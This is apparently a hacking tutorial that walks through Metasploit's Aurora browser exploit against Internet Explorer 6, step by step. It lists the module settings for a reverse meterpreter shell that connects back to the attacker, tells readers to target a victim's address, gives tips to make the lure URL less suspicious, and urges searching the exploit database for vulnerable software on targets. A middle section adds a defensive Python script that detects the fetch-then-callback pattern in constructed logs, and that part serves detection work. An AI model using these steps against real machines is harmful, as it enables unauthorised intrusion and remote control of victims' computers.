Aurora is a browser-based exploit, which means that the payload is delivered through the browser on the victim machine. Aurora exploits a memory corruption flaw in Internet Explorer 6. It’s quite outdated, but we’re taking baby steps here and this one’s quite easy.
This very exploit was used in Operation Aurora by a group of hackers who compromised a large number of major computer systems, including Adobe. This attack started in mid-2009 and continued through December. Internet Explorer has a ridiculously long list of potential vulnerabilities, although most (if not all) have been fixed in today’s version. Every piece of software will have its bad day at some point. The only way to avoid the fallout is to keep up with the news, maybe just peek at the headlines, and stay away from dangerous applications. Zero-day exploits are known to be used by several hackers to set up zombie networks without the (potentially thousands of) victims ever finding out.
IE 6 was released in 2001; to carry out this hack you may want to download the older version of IE.
Fire up Metasploit and let’s start by choosing aurora:
Next, set payload to reverse meterpreter.
»set payload windows/meterpreter/reverse_tcp
Now we need to input LHOST, LPORT (for the payload) and SRVHOST for aurora. LHOST and SRVHOST have to be the same. You can also change SRVPORT, but you can leave it at 8080 (the default) if you want.
»set LHOST 192.168.2.103
»set LPORT 4444
»set SRVHOST 192.168.2.103
(The IP address used is just an example; you need to replace it with the address of your victim.) We also have the option to change URIPATH. What’s that? This exploit works by opening a URL in the old buggy IE6. URIPATH gives us that URL, which, when opened on our victim’s computer, sets up a connection through the specified ports to us, giving us the meterpreter session.
The best way to practice these attacks and exploits is with a willing (and trustworthy) friend. You can also set up multiple virtual machines on your own system, but I think that overly complicates things; plus, most average computers have a hard time running a single virtual machine with decent performance. If you have more than one computer, maybe a laptop, you could try getting a LAN (Ethernet) cable and connecting the two together. Again, the easiest way is two systems with known IP addresses connected to the internet.
We’re simply going to set the URIPATH to a slash character, which will let Metasploit come up with its own URL that we can use. It should be something like:
Changing the URIPATH to a slash character, as below, gives us a shorter URL. Doesn’t really matter, but it’s a tiny bit less suspicious.
»set URIPATH /
Type exploit, and our local server will start. That is, when the victim opens up the URL we send them, it connects them directly to our makeshift server. It won’t open anything in the victim’s browser, just a blank page, but it establishes the connection and gives us the meterpreter session. Mission accomplished.
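The sequence just described has a shape a defender can look for: the victim’s browser first fetches a page from the serving host on the server port (8080 by default), and moments later the same victim opens an outbound connection to that same host on the payload’s listening port (4444 here), because LHOST and SRVHOST are the same address. The script below is an added example, not part of the original post or of Metasploit; it runs over a few constructed firewall-style log lines (the addresses, timestamps and the 60-second pairing window are all assumptions for the example) and flags any host that shows the fetch-then-callback pair to one server.

```python
"""
Flag the browser-exploit-then-callback pattern: a host fetches from
server:SERVE_PORT and, within WINDOW, connects to server:CALLBACK_PORT.
All log lines, addresses and ports below are constructed for this example.
"""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample connection log (chronological order assumed).
# Fields: ISO timestamp, src, dst, dport, proto. Not real traffic.
SAMPLE_LOG = """\
2009-12-14T10:01:02 src=192.168.2.55 dst=192.168.2.103 dport=8080 proto=tcp
2009-12-14T10:01:04 src=192.168.2.55 dst=192.168.2.103 dport=4444 proto=tcp
2009-12-14T10:05:00 src=192.168.2.60 dst=192.168.2.103 dport=8080 proto=tcp
2009-12-14T10:06:30 src=192.168.2.60 dst=10.0.0.9 dport=443 proto=tcp
2009-12-14T10:07:00 src=192.168.2.61 dst=192.168.2.103 dport=4444 proto=tcp
2009-12-14T11:00:00 src=192.168.2.62 dst=192.168.2.103 dport=8080 proto=tcp
2009-12-14T11:30:00 src=192.168.2.62 dst=192.168.2.103 dport=4444 proto=tcp
"""

SERVE_PORT = 8080              # SRVPORT default quoted in the walkthrough
CALLBACK_PORT = 4444           # LPORT used in the walkthrough
WINDOW = timedelta(seconds=60) # assumption: callback follows the page load quickly


def parse_line(line):
    """Turn 'TS k=v k=v ...' into a dict with a datetime and an int port."""
    ts, *fields = line.split()
    rec = dict(f.split("=", 1) for f in fields)
    rec["ts"] = datetime.fromisoformat(ts)
    rec["dport"] = int(rec["dport"])
    return rec


def find_sequences(log_text, serve_port=SERVE_PORT,
                   callback_port=CALLBACK_PORT, window=WINDOW):
    """Return (src, server, fetch_ts, callback_ts) for every source that
    fetched from server:serve_port and then reached server:callback_port
    within `window`. A bare callback with no preceding fetch, or a fetch
    followed by traffic to a different host, is not reported."""
    fetches = defaultdict(list)  # (src, dst) -> timestamps of page fetches
    hits = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        rec = parse_line(line)
        key = (rec["src"], rec["dst"])
        if rec["dport"] == serve_port:
            fetches[key].append(rec["ts"])
        elif rec["dport"] == callback_port:
            for fetch_ts in fetches[key]:
                if timedelta(0) <= rec["ts"] - fetch_ts <= window:
                    hits.append((rec["src"], rec["dst"], fetch_ts, rec["ts"]))
                    break
    return hits


if __name__ == "__main__":
    for src, server, fetch_ts, cb_ts in find_sequences(SAMPLE_LOG):
        print(f"{src} fetched from {server}:{SERVE_PORT} at {fetch_ts.time()} "
              f"and called back on {CALLBACK_PORT} at {cb_ts.time()}")
```

Only the first host in the sample is reported: the third only touched the callback port, the second wandered off to an unrelated host, and the last pair sits half an hour apart, outside the assumed window. In a real environment the two ports are whatever the operator chose, so the check is best run with the list of ports your browsers have no business contacting rather than these two literals.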
So, now we know another exploit, another way to break into our victim’s computer. In reality, we haven’t even scratched the surface yet. There are currently over 2500 different exploits included in Metasploit that we can use. The entire database is available at:
You can head over there and enter search queries to find different exploits. Suppose that you know a system has an old version of some software, say Adobe Reader 9.1. You can type ‘adobe reader 9.1’ in the search box and it will give you a list of all the exploits that you can use against the faulty software to gain access to the computer. I recommend you try out as many as you can. Take a look at your own computer, see if you can find any exploitable application on it, maybe challenge a friend to find a new vulnerability on your system. In hacking, knowing the tricks of the trade involves getting used to the usual hacking process. What we’re doing is just that. Metasploit is an incredibly powerful tool with tons of features and options. The best way to learn a piece of software is to press every button just to see what happens. So go ahead. Explore.